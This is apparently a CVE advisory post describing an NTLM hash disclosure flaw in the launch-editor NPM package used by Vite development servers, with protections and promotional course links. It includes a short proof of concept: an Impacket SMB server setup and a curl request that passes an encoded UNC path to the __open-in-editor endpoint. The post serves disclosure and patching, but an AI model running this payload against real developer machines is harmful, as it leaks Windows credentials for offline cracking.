Listen to this Post
The vulnerability exists because the `launch-editor` NPM package, commonly used in development servers like Vite, accepts file paths without validating or restricting Windows UNC (Universal Naming Convention) paths such as \\attacker-host\share. When a Windows system accesses a UNC path, it automatically attempts NTLM authentication to the remote SMB server without any user interaction or warning. If an attacker controls the SMB server referenced by the UNC path, the victim’s NTLMv2 hash is transmitted to the attacker. The attacker can then capture the hash and perform offline password cracking, revealing the victim’s cleartext password. This attack can be triggered by a malicious website that sends a request to a middleware using launch-editor, or by a developer being tricked into opening a specially crafted link while a development server is running. Successful exploitation leads to credential compromise, potentially allowing further access to developer accounts or internal systems.
DailyCVE Form:
Platform: Windows
Version: ≤2.14.0
Vulnerability: NTLM hash disclosure
Severity: Medium
date: 2026-06-01
Prediction: Patch available 2026-06-01
What Undercode Say:
Setup SMB share and start server mkdir /tmp/data echo "Hello world" > /tmp/data/test.txt sudo smbserver.py -smb2support -debug share /tmp/data Trigger hash disclosure via curl curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt'
Exploit:
Attacker sets up malicious SMB server (e.g., using Impacket’s smbserver.py). Victim is lured to a website or clicks a link that sends a request to a vulnerable development server with a crafted URL containing a UNC path pointing to the attacker’s SMB server. Windows automatically initiates NTLM authentication, transmitting the victim’s NTLMv2 hash to the attacker, who then captures it for offline cracking.
Protection:
Upgrade `launch-editor` to version 2.14.1 or higher. On Windows, disable NTLM authentication if not required. Implement strict input validation for file paths in middleware. Use security software to monitor outgoing SMB connections. Avoid running development servers with exposed endpoints in untrusted environments.
Impact:
Full compromise of Windows user credentials via offline cracking of captured NTLMv2 hashes, potentially leading to unauthorized access to developer accounts, internal systems, and further lateral movement within the network.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
